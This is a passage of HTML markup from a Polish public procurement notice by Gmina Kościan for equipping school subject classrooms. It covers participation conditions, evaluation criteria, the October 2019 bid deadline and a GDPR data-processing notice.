maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'>13</TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'>13</TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Część 1 zamówienia: Termin realizacji: najkrótszy termin realizacji zamówienia - 5 dni roboczych od dnia podpisania umowy, natomiast najdłuższy termin - 13 dni roboczych od dnia podpisania umowyCzęść 2 zamówienia: Termin realizacji: najkrótszy termin realizacji zamówienia - 5 dni roboczych od dnia podpisania umowy, natomiast najdłuższy termin - 13 dni roboczych od dnia podpisania umowy</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Formularz ofertowy- załącznik nr 1 do SIWZ wraz z formularzem cenowym załącznik nr 1a (obowiązek złożenia formularza cenowego dotyczy tylko wykonawców składających ofertę na 2 część zamówienia)2. Pełnomocnictwo, o którym mowa w art. 23 ust 2 ustawy PZP (jeżeli dotyczy) 3.Pełnomocnictwo do podpisania oferty, względnie do podpisania innych oświadczeń lub dokumentówskładanych wraz z ofertą (jeżeli dotyczy) 4. Wykonawca, w terminie 3 dni od dnia zamieszczenia nastronie internetowej informacji, o której mowa wart. 86 ust. 5, przekazuje zamawiającemuoświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. Wraz ze złożeniem oświadczenia, Wykonawca możeprzedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji wpostępowaniu o udzielenie zamówienia;</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena </TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin realizacji </TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Istotna zmiana postanowień Umowy w stosunku do treści Oferty Wykonawcy możliwa jest wyłącznie wprzypadkach określonych w art. 144 ust. 1 pkt 2)-6) ustawy Pzp</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-10-18</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Informacja RODOZgodnie z art. 13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej ,,RODO", informuję, że: ?	administratorem Pani/Pana danych osobowych jest Wójt Gminy Kościan, ul. Młyńska 15, 64-000 Kościan;?	w sprawach związanych z Pana/Pani danymi proszę kontaktować się z Inspektorem Ochrony Danych pod adresem e-mail iod@comp-net.pl;?	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia pn. ,,Poprawa warunków dydaktycznych dla uczniów w szkołach na terenie Gminy Kościan - doposażenie pracowni przedmiotowych - II przetarg"?	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2019 r. poz.1843), dalej ,,ustawa Pzp" - art. 139 ust. 3 ustawy Pzp, - przepisy ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej (tj. Dz. U. z 2016 r. poz. 1764 ze zm. ), - przepisy właściwe dla instytucji kontrolnych wobec zamawiającego.?	Dane osobowe będą przechowywane przez okres obowiązywania umowy a następnie przez 5 lat, albo 10 lat w przypadku zamówień współfinansowanych ze środków UE, począwszy od 1 stycznia roku kalendarzowego następującego po zakończeniu okresu obowiązywania umowy, chyba że niezbędny będzie dłuższy okres przetwarzania, np. z uwagi na obowiązki archiwizacyjne, dochodzenie roszczeń lub inny obowiązek wymagany przez przepisy prawa powszechnie obowiązującego. Okresy te dotyczą również Wykonawców, którzy złożyli oferty i nie zostały one uznane, jako najkorzystniejsze (nie zawarto z tymi Wykonawcami umowy)?	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;?	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;?	posiada Pani/Pan:-	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia-	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowychSkorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać integralności protokołu oraz jego załącznikówSkorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą-	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODOOd dnia zakończenia postępowania o udzielenie zamówienia, w przypadku gdy wniesienie żądania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole i załącznikach do protokołu, zamawiający nie udostępnia tych danych zawartych w protokole i w załącznikach do protokołu, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursuPrawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.-	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;?	nie przysługuje Pani/Panu:-	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;-	prawo do przenoszenia danych osobowych, o którym mowaw art. 20 RODO;-	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, 